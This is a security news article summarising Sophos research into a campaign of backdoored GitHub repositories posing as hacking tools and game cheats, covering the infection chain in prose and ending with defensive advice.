Cybersecurity researchers at Sophos have uncovered a sophisticated malware distribution campaign that weaponizes GitHub’s trusted platform to target security professionals, gamers, and researchers. The operation involves 141 malicious repositories, with 133 containing hidden backdoors disguised as legitimate security tools, game cheats, and exploits.
Discovery Through Sakura RAT Analysis
The investigation began when a Sophos client requested an assessment of the Sakura RAT trojan discovered in a public GitHub repository. While the trojan itself appeared non-functional, researchers identified a hidden PreBuildEvent mechanism within the Visual Studio project that automatically downloads and installs malware when users attempt to compile the code.
Further investigation revealed that the publisher, operating under the pseudonym “ischhfd83,” maintained connections to 141 GitHub repositories. This discovery exposed the true scope of the operation, demonstrating how threat actors exploit the open-source community’s trust in collaborative development platforms.
Advanced Deception Techniques
The attackers employed sophisticated methods to create an illusion of legitimate development activity. Automated commit systems generated fake development histories, with some projects displaying nearly 60,000 commits despite being created only months earlier. The average commit count across malicious repositories reached 4,446 at the time of analysis.
To avoid detection, threat actors limited each account to a maximum of nine repositories and used no more than three contributors per project. This strategy helped maintain a lower profile while maximizing the campaign’s reach across the platform.
Multi-Vector Distribution Strategy
Traffic to malicious repositories originated from diverse sources, including YouTube tutorials, Discord communities, and specialized hacking forums. Media coverage of Sakura RAT inadvertently amplified the campaign’s effectiveness, attracting attention from novice hackers and script kiddies seeking ready-made tools.
The campaign specifically targeted three primary audiences: cybersecurity professionals researching new tools, gamers seeking cheats and modifications, and IT specialists studying malware samples for educational purposes.
Complex Infection Chain
The malware deployment process involves a multi-stage attack chain that begins when users download and execute trojanzied files. The infection sequence includes VBS script execution, encrypted payload retrieval through PowerShell from hardcoded URLs, 7zip archive downloads from GitHub, and deployment of a specialized Electron application called SearchFilter.exe.
The final payload contains obfuscated code designed for system profiling, command execution, Windows Defender deactivation, and additional component extraction. Researchers identified various malicious programs within the campaign, including Lumma infostealers, AsyncRAT, and Remcos trojans.
Diverse Backdoor Implementation Methods
Analysis revealed multiple backdoor deployment techniques across the malicious repositories. Python scripts contained obfuscated payloads, while malicious screensaver files leveraged Unicode encoding for evasion. JavaScript files employed encoded payloads, and Visual Studio PreBuild events enabled automatic execution without user awareness.
This variety in attack vectors demonstrates the threat actors’ technical sophistication and understanding of different development environments commonly used by their target audiences.
Critical Security Implications
This campaign highlights significant risks associated with unverified code from open repositories, particularly for cybersecurity professionals who regularly analyze suspicious software. The attackers successfully exploited the community’s trust in GitHub’s platform and the open-source development model.
Organizations must implement comprehensive security measures including thorough source code review before compilation, isolated testing environments for suspicious software, and continuous network activity monitoring. This incident underscores the importance of maintaining critical thinking even within the cybersecurity community, where threat actors successfully exploit professional curiosity and trust. Security teams should establish clear protocols for evaluating third-party code and maintain updated threat intelligence to recognize similar campaigns targeting their industry.
